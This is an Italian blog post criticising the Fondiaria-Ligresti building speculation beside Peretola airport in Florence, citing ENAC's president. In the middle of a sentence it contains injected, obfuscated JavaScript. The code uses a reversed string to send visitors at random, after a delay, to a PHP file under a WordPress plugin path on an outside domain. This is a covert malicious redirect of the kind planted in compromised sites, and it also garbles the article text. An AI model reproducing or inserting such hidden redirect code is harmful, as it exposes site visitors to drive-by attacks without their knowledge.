Abusi: c’è chi può…

image_pdfimage_print

La speculazione di Fondiaria nell’area di Castello è “in forte contrasto con la possibilità di espansione di un aeroporto che è già molto stretto, ma anche lì senza il parere dell’ENAC non si potrà costruire niente, presidente dell’ENAC, l’Ente Nazionale per l’Aviazione Civile, ai microfoni di Report, la trasmissione di approfondimento di Rai Tre. Sull’avvenuto avvio dei lavori nell’area il presidente Riggio ha inoltre dichiarato come l’ENAC abbia fatto presente alle istituzioni preposte che a Peretola il codice della navigazione è in funzione, e che quindi “chiunque abbia cantierato prima che sia stato completato lo studio sul rischio lo ha fatto a proprio rischio e pericolo dal punto di vista anche delle responsabilità”.
Cosa significano queste dichiarazioni pronunciate dalla massima autorità nazionale in materia aeroportuale? Che nell’area di Peretola-Castello molto probabilmente qualcuno ha fatto il furbo. Ha dato il permesso per la costruzione di oltre un milione di metri cubi di cemento senza nessun tipo di autorizzazione da parte delle autorità nazionali per la sicurezza aerea. In pratica si è permesso di costruire palazzi accanto alla pista dell’aeroporto. E chi li costruirà? La Fondiaria di Salvatore Ligresti. Per chi? Per Regione e Provincia che sposteranno lì i loro uffici. Alla fine ci troviamo di fronte ad un doppio favore a Ligresti: prima si autorizza a costruire addosso all’aeroporto; poi qu (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}ando ci si accorge che nessuno comprerà mai una casa a rischio disastro aereo si decide di portarci gli uffici pubblici. Il costo dell’operazione? Un miliardo di euro.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *